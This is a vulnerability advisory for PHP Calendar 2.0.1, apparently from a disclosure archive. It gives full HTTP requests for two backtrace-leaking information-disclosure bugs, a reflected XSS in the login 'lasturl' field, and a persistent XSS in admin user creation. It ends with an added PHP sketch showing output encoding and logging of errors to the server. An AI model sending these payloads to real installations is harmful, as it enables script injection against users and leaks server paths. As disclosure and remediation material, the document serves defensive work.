PHP Calendar 2.0.1 XSS / Information Disclosure

2014.02.28
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ==============================================================
# Title ...| PHP Calendar Multiple vulnerabilities
# Version .| php-calendar-2.0.1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] As guest

# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1
Host: 10.149.14.62
---<request>---

---<response>---
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#3 {main}</pre>
---<response>---

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd
---<request>---

# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132

action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC
---<request>---

---<response>---
<div class="phpc-main"><h2>Error</h2>
<p>Malformed &quot;search-from&quot; date: &quot;\'`\&quot;;--#%/*&quot;</p>
<h3>Backtrace</h3>
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed &quot;sear...')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from')
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results()
#3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search()
#4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval()
#5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#7 {main}</pre>
---<response>---

# ==============================================================
# [+] From admin logged-in
# ==============================================================
# 4. Persistent XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 197

phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
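
Mitigation sketch for the four items above, as an added example that is not part of the original advisory and is not PHP-Calendar's own code: request values are HTML-encoded at output, and the backtrace is written to the server log instead of the page. The function names `h`, `hidden_field` and `render_error` are hypothetical, and echoing `lasturl` into a hidden form field is an assumption about where the value is reflected.

```php
<?php
// Added example; function names are hypothetical, not PHP-Calendar's code.

// Encode untrusted text for HTML body and quoted-attribute contexts.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render a form field such as "lasturl" with an encoded value
// (assumption: the application reflects the parameter into a form field).
function hidden_field(string $name, string $value): string
{
    return '<input type="hidden" name="' . h($name) . '" value="' . h($value) . '">';
}

// Report an error without exposing file paths: the backtrace goes to the
// server log under a random reference id; the page gets only the encoded
// message and that id.
function render_error(Throwable $e): string
{
    $ref = bin2hex(random_bytes(4));
    error_log("[$ref] " . $e->getMessage() . "\n" . $e->getTraceAsString());
    return '<div class="phpc-main"><h2>Error</h2><p>' . h($e->getMessage())
        . '</p><p>Reference: ' . $ref . '</p></div>';
}

// Constructed sample input: the lasturl value from request 2, URL-decoded.
$lasturl = urldecode('\'%3e"%3e%3cbody%2fonload%3dalert(9999)%3e');
echo hidden_field('lasturl', $lasturl), "\n";

// Constructed sample error, modelled on the message shown in response 3.
try {
    throw new InvalidArgumentException('Malformed "search-from" date: ' . $lasturl);
} catch (InvalidArgumentException $e) {
    echo render_error($e), "\n";
}
```

The same `h()` call applies wherever a stored value such as `user_name` is later written into a page, which is what addresses the persistent case in item 4.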

